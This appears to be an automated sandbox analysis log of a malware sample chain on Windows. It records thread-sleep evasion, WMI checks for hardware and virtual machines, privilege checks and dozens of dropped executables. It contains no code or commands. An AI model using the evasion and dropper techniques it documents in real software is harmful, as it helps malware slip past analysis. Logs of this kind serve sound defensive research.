Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 600000
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599890
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599718
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599593
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599483
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599374
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599265
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599140
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599031
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 300000
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598921
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598811
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598696
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598590
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598359
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598210
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598093
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 3600000
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597983
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597874
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597765
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597656
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597546
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597437
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597328
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597218
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597109
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596999
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596890
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596781
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596670
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596562
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596453
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596343
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596234
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596124
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596012
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595905
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595792
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595669
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595545
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595431
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595312
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595202
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595088
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594968
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594859
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594749
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594640
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594531
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594421
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594312
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594202
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594093
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 593984

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window / User API: threadDelayed 1265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window / User API: threadDelayed 1293	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window / User API: threadDelayed 1274	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 364	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 2761	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 2847	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 3028	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Window / User API: threadDelayed 426
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Window / User API: threadDelayed 9602

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169810101\v6Oqdnc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169820101\zY9sqWs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169800101\HmngBpR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169790101\ADFoyxP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SUySEdWK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169880101\EJmAkGq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3B05c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169740101\c881d851ae.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ADFoyxP[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169730101\d151155bf3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\HmngBpR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\EJmAkGq[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\zY9sqWs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169690101\c353af48cf.exe	Jump to dropped file
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zIqELuAV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169000101\EJmAkGq.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169700101\f86c60eea6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169720101\477fbd5c21.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\v6Oqdnc[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10169710101\f3f3c71039.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_1-2449

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe TID: 7400	Thread sleep count: 1265 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe TID: 7400	Thread sleep time: -2531265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe TID: 7392	Thread sleep count: 1293 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe TID: 7392	Thread sleep time: -2587293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe TID: 7488	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe TID: 7408	Thread sleep count: 1274 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe TID: 7408	Thread sleep time: -2549274s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7788	Thread sleep count: 61 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7788	Thread sleep time: -122061s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7800	Thread sleep count: 71 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7800	Thread sleep time: -142071s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7752	Thread sleep count: 364 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7752	Thread sleep time: -10920000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7784	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7784	Thread sleep time: -128064s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7776	Thread sleep count: 2761 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7776	Thread sleep time: -5524761s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7772	Thread sleep count: 2847 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7772	Thread sleep time: -5696847s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7780	Thread sleep count: 3028 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7780	Thread sleep time: -6059028s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe TID: 7956	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe TID: 7960	Thread sleep time: -44022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe TID: 6464	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe TID: 7212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe TID: 7272	Thread sleep count: 426 > 30
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe TID: 7228	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe TID: 7200	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe TID: 2068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 5408	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -599890s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -599718s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -599593s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -599483s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -599374s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -599265s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -599140s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -599031s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7152	Thread sleep time: -300000s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -598921s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -598811s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -598696s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -598590s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -598359s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -598210s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -598093s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7152	Thread sleep time: -3600000s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597983s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597874s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597765s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597656s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597546s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597437s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597328s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597218s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -597109s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596999s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596890s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596781s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596670s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596562s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596453s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596343s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596234s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596124s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -596012s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -595905s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -595792s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -595669s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -595545s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -595431s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -595312s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -595202s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -595088s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594968s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594859s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594749s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594640s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594531s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594421s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594312s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594202s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -594093s >= -30000s
Source: C:\Windows\twain_32\1u58lIqYIC.exe TID: 7676	Thread sleep time: -593984s >= -30000s

Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\twain_32\1u58lIqYIC.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\twain_32\1u58lIqYIC.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\1u58lIqYIC.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Code function: 1_2_00E22390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00E22390
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A9AA8E FindFirstFileExW,	17_2_00A9AA8E
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A9AB3F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	17_2_00A9AB3F

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E25467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

1_2_00E25467

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 30000
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 600000
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599890
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599718
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599593
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599483
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599374
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599265
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599140
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 599031
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 300000
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598921
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598811
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598696
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598590
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598359
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598210
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 598093
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 3600000
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597983
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597874
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597765
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597656
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597546
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597437
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597328
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597218
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 597109
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596999
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596890
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596781
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596670
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596562
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596453
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596343
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596234
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596124
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 596012
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595905
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595792
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595669
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595545
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595431
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595312
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595202
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 595088
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594968
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594859
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594749
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594640
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594531
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594421
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594312
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594202
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 594093
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Thread delayed: delay time: 593984

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
